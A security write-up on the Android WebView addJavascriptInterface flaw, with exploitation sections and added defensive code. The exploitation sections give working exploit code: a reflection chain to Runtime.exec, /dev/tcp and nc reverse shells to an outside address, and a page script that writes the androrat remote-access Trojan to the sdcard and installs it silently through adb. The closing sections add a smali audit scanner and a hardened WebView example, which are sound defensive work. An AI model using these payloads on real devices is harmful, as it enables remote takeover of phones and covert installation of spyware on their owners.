0x00 Background
WebView is a control in the Android SDK that wraps an embedded web browser. An app loads a WebView and can set its attributes (colour, font, etc.), much like DirectUI on the PC. WebView has one very special interface method, addJavascriptInterface, which lets local Java code and page JavaScript interact; through it, WebKit can be made to control the Android device.
0x01 Exploitation
In general, addJavascriptInterface is almost unavoidable when an application builds its pages with HTML; this includes, but is not limited to, Android browsers.
Android code typically uses it as follows:
settings.setJavaScriptEnabled(true);
settings.setJavaScriptCanOpenWindowsAutomatically(true);
mWebView.addJavascriptInterface(new JSInvokeClass(), "js2java");
Here the Java code can be recovered via apk -> zip -> dex -> dex2jar -> JD-GUI -> java.
However, we recommend using apktool to decompile to smali (after all, not every APK can be decompiled back into Java code).
In smali, the call looks like this:
const-string v0, "js2java"
invoke-virtual {p1, v1, v0}, Lcom/tiantianmini/android/browser/module/ac;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
Once the above code is found, further verification and exploitation can follow:
In 2011 some people used addJavascriptInterface to read and write files and released a simple PoC. In 2012 a simple code-execution exp appeared: it uses reflection on the exposed Java object to reach the static getRuntime method of the Runtime class, with the following code:
<script>
function execute(cmdArgs) {
    return js2java.getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
}
…
</script>
Linux shell commands are executed through Java's exec.
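To check a decompiled build for the smali pattern shown in this section, the following audit helper walks the smali text, tracks the last const-string loaded into each register, and reports every addJavascriptInterface call together with the JavaScript name the bridge is registered under. This is an added example, not code from the original post; the sample smali embedded in it is constructed around the line quoted above, and the class name Lcom/example/JSInvokeClass; is hypothetical.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added audit helper (not from the original post): finds addJavascriptInterface
// registrations in smali and resolves the bridge name from the preceding const-string.
public class BridgeAudit {

    // const-string vN, "literal"  (const-string/jumbo is used for large string pools)
    private static final Pattern CONST_STRING =
            Pattern.compile("^const-string(?:/jumbo)?\\s+([vp]\\d+),\\s*\"([^\"]*)\"");

    // invoke-virtual {regs}, Lowner;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    private static final Pattern ADD_JS_INTERFACE = Pattern.compile(
            "^invoke-virtual\\s*\\{([^}]*)\\},\\s*(L[^;]+;)->addJavascriptInterface"
            + "\\(Ljava/lang/Object;Ljava/lang/String;\\)V");

    public static final class Finding {
        public final int line;          // 1-based line number in the smali text
        public final String owner;      // class the call is made on (a WebView or a subclass)
        public final String bridgeName; // JavaScript-visible name, or "?" if not a literal

        Finding(int line, String owner, String bridgeName) {
            this.line = line;
            this.owner = owner;
            this.bridgeName = bridgeName;
        }

        @Override
        public String toString() {
            return "line " + line + ": " + owner + " exposes bridge \"" + bridgeName + "\"";
        }
    }

    public static List<Finding> scan(String smali) {
        List<Finding> findings = new ArrayList<>();
        Map<String, String> registers = new HashMap<>();
        String[] lines = smali.split("\\r?\\n");
        for (int i = 0; i < lines.length; i++) {
            String line = lines[i].trim();
            if (line.startsWith(".method")) {
                registers.clear();  // register contents do not carry across methods
                continue;
            }
            Matcher cs = CONST_STRING.matcher(line);
            if (cs.find()) {
                registers.put(cs.group(1), cs.group(2));
                continue;
            }
            Matcher inv = ADD_JS_INTERFACE.matcher(line);
            if (inv.find()) {
                // arguments are {receiver, object, name}; the name is the last register
                String[] args = inv.group(1).split(",");
                String nameReg = args[args.length - 1].trim();
                findings.add(new Finding(i + 1, inv.group(2), registers.getOrDefault(nameReg, "?")));
            }
        }
        return findings;
    }

    // Constructed sample smali built around the line quoted in the post.
    static final String SAMPLE =
            ".method public onCreate(Landroid/os/Bundle;)V\n"
            + "    .locals 2\n"
            + "    new-instance v1, Lcom/example/JSInvokeClass;\n"
            + "    invoke-direct {v1}, Lcom/example/JSInvokeClass;-><init>()V\n"
            + "    const-string v0, \"js2java\"\n"
            + "    invoke-virtual {p1, v1, v0}, Lcom/tiantianmini/android/browser/module/ac;"
            + "->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V\n"
            + "    return-void\n"
            + ".end method\n";

    public static void main(String[] args) {
        for (Finding f : scan(SAMPLE)) {
            System.out.println(f);
        }
    }
}
```

In practice the text of every .smali file under the apktool output directory is fed to scan(); any finding on a release build that is supposed to have dropped the bridge, or that registers a name not on the app's own list, is a regression to investigate.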
0x02 Remote shell retrieval
To borrow yuange's words, a PoC is worth far less than an exp.
So we use addJavascriptInterface to obtain a shell.
Android's ARM Linux has no busybox, and some of the usual shell methods are restricted.
The Java-style reverse shell method was tried first:
//execute(["/system/bin/sh","-c","exec 5<>/dev/tcp/192.168.1.9/8088;cat <&5 | while read line; do \$line 2>&5 >&5; done"]);
On a Nexus One Android 4.3 virtual machine the shell did not come back successfully.
It was then found that the nc command can be executed on Android (a stripped-down nc without -e).
So another nc shell method is used here.
Exp content:
<script>
function execute(cmdArgs) {
    return XXX.getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
}
execute(["/system/bin/sh", "-c", "nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999"]);
alert("ok3");
</script>
// Note: XXX stands in for the real bridge name, for privacy.
The result was captured in a screenshot in the original post.
Of course, a remote IP address can be used as well.
0x03 Remote Trojan delivery
After all, this is an Android environment, and a shell is not very convenient to use; something like an XSS-er certainly does not meet this requirement.
So the next step is to deliver a Trojan from the web page.
Android 4.1 added ASLR, so heap spraying is no longer effective, and UAF exploits depend on the particular Android kernel version. Exploiting the characteristics of the vulnerability itself is currently the reliable approach.
Here we take the androrat remote-control Trojan as the example.
Implementing the web-page Trojan
Most browsers prompt before saving downloaded files. Here I wrote androrat.apk directly into the Trojan web page.
<script>function execute(cmdArgs){return xxx.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);} var armBinary = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x51\\x8F\\xCA\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x13\\x00\\x04\\x00\\x72\\x65\\x73\\x2F\\x6C\\x61\\x79\\x6F\\x75\\x74\\x2F\\x6D\\x61\\x69\\x6E\\x2E\\x78\\x6D\\x6C\\xFE\\xCA\\x00\\x00\\xAD\\x52\\x31\\x6F\\xD3\\x40\\x18\\xFD\\x2E\\x76\\xAE\\x86\\xC4\\x69\\x5A\\x3A\\x54\\xA2\\x12\\xA9\\xC4\\x80\\x22\\x61\\xE3\\xAA\\x42\\x4D\\xC7\\x22\\x86\\x4A\\x91\\xA8\\x14\\xC4\\x0A\\x56\\x7C\\xC2\\x27\\x68\\x1C\\x39\\x57\\x0A\\x53\\x11\\x3B\\x63\\x37\\x06\\xFE\\x01\\x33\\x1B\\x43\\x17\\x36\\x56\\xFE\\x07\\xAC\\x6D\\x9F\\xCB\\x1D\\x3D\\x……var patharm = "/data/app/Androrat.apk";var a=execute(["/system/bin/sh","-c","echo -n '"+armBinary+"' > " + patharm]);execute(["chmod"," 755 ","/data/app/Androrat.apk"]);
There are several problems:
The hex form of androrat.apk is about 300 KB; the browser or Java exec may limit the argument size (the tested browser could not execute the command).
The /data/app/ directory has permission issues and requires root; the same goes for chmod.
On Android, silent installation requires either root or the system-signed install permission, or being built in as preinstalled software and rebooting; alternatively the hidden install API can be called (Android 2.2 or later).
After some fuzzing, the Trojan-delivery function was completed:
<script>function execute(cmdArgs){return xxx.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);} var armBinary1 = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x51\\x8F\\xCA\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x13\\x00\\x04\\x00\\x72\\x65\\x73\\x2F\\x6C\\x61\\x79\\x6F\\x75\\x74\\x2F\\x6D\\x61\\x69\\x6E\\x2E\\x78\\x6D\\x6C\\xFE\\xCA\\x00\\x00\\xAD\\x52\\x31\\x6F\\xD3\\x40\\x18\\xFD\\x2E\\x76\\xAE\\x86\\xC4\\x69\\x5A\\x3A\\x54\\xA2\\x12\\xA9\\xC4\ var armBinary2="\\x1B\\xB0\\x65\\x0A\\xAD\\x23\\xC2\\x30\\x64\\xDF\\xEE\\xA1\\x0D\\xA4\\xE8\\x3F\\x61\\x80\\xEE\\xBC\\xE1\\xE7\\x7B\\x4A\\x25\\x6F\\x8B\\x36\\x71\\xC3\\x80\\x81\\x58\\xDB\\xC9\\x8F\\x53\\x9F\\xEE\\x8A\\x45\\xAF\\x23\\x54\\x4A\\xCF\\x2B\\x52\\xF2\\x33\\x84\\xBA\\x82\\x36\\xC4\\x0D\\x08\\xAF\\xC2\\x61\\x8E\\xD8\\x7B\\x0B\\xFC\\x88\\x4A\\x25\\x24\\x8C\\x22\\xFA\\x76\\x44\\x78\\x5E\\x99\\x62\\x30\\x44\\x8D\\xDB\\x74\\x94\\ var armBinary3=…var armBinary4=………var patharm = "/mnt/sdcard/Androrat.apk";var a=execute(["/system/bin/sh","-c","echo -n '"+armBinary1+"' > " + patharm]);//alert(a);execute(["/system/bin/sh","-c","echo -n '"+armBinary2+"' >> " + patharm]);execute(["/system/bin/sh","-c","echo -n '"+armBinary3+"' >> " + patharm]);execute(["/system/bin/sh","-c","echo -n '"+armBinary4+"' >> " + patharm]);execute(["/system/bin/sh","-c","adb install /mnt/sdcard/Androrat.apk"]);alert("over !!!");</script>
Split androrat.apk into pieces.
Use echo to write the data to the sdcard (this directory is readable and writable but not executable).
Use the device's own adb to install it (not many devices have an XX phone assistant installed).
The screenshot in the original post shows androrat installed successfully; androrat's debug = true mode is used here.
It then connects to the control end.
0x04 Repair
1. Android 4.2 (API 17) introduced a new mechanism [the methods have to be annotated on the Java side :)]: the @JavascriptInterface annotation now governs what addJavascriptInterface exposes. Some Android 2.3 devices will never be upgraded, so browsers still have to stay compatible with them.
2. When using a js2java bridge, every input parameter must be validated so that attack code is filtered out.
3. Restrict the related permissions, or try not to use a js2java bridge at all.
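The three repair points above, put together in one Activity: a bridge that exposes only @JavascriptInterface-annotated methods, strict allow-list validation of every argument, and registration only on platforms that honour the annotation, with page loads restricted to a trusted origin. This is an added example, not code from the original post; it assumes targetSdkVersion >= 17 in the manifest (without that, API 17+ devices still expose every public method) and a hypothetical trusted host app.example.com.

```java
import android.annotation.SuppressLint;
import android.app.Activity;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.regex.Pattern;

// Added example (not from the original post). Assumes targetSdkVersion >= 17.
public class SafeBridgeActivity extends Activity {

    static final String TRUSTED_HOST = "app.example.com"; // hypothetical origin

    // With targetSdkVersion >= 17 only @JavascriptInterface methods are callable from
    // JavaScript, so getClass()/forName() reflection chains are no longer reachable.
    public static final class JsInvokeClass {
        private static final Pattern SAFE_ID = Pattern.compile("^[A-Za-z0-9_-]{1,64}$");
        private final Activity host;

        JsInvokeClass(Activity host) { this.host = host; }

        // Allow-list validation: anything that is not a plain identifier is rejected.
        static boolean isSafeId(String id) {
            return id != null && SAFE_ID.matcher(id).matches();
        }

        @JavascriptInterface
        public boolean openArticle(final String id) {
            if (!isSafeId(id)) return false;  // page input never reaches a shell or reflection
            host.runOnUiThread(new Runnable() {
                @Override public void run() { host.setTitle("article:" + id); }
            });
            return true;
        }

        // No annotation: public, but not callable from JavaScript on API 17+.
        public void internalHelper() { }
    }

    // Only https pages from the trusted host may run inside this WebView.
    static boolean isTrustedUrl(String url) {
        Uri u = Uri.parse(url);
        return "https".equals(u.getScheme()) && TRUSTED_HOST.equalsIgnoreCase(u.getHost());
    }

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);

        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        settings.setJavaScriptCanOpenWindowsAutomatically(false);
        settings.setAllowFileAccess(false);  // file:// content must not reach the bridge

        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isTrustedUrl(url);  // true = the WebView does not load it
            }
        });

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new JsInvokeClass(this), "js2java");
        }
        // Below API 17 every public method of the object is exposed regardless of the
        // annotation, so on those devices the bridge is simply not registered (point 3).
        // Some 3.x/4.x WebViews also inject a bridge of their own; remove it where possible.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
            webView.removeJavascriptInterface("searchBoxJavaBridge_");
        }
        webView.loadUrl("https://" + TRUSTED_HOST + "/index.html");
    }
}
```

The validation in isSafeId is the part that does the work of point 2: the bridge never hands a string from the page to exec, reflection or a file path, it only checks it against a narrow pattern and then uses it in a way the app controls.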
Links:
http://developer.android.com/reference/android/webkit/WebView.html
http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf
http://50.56.33.56/blog/?p=314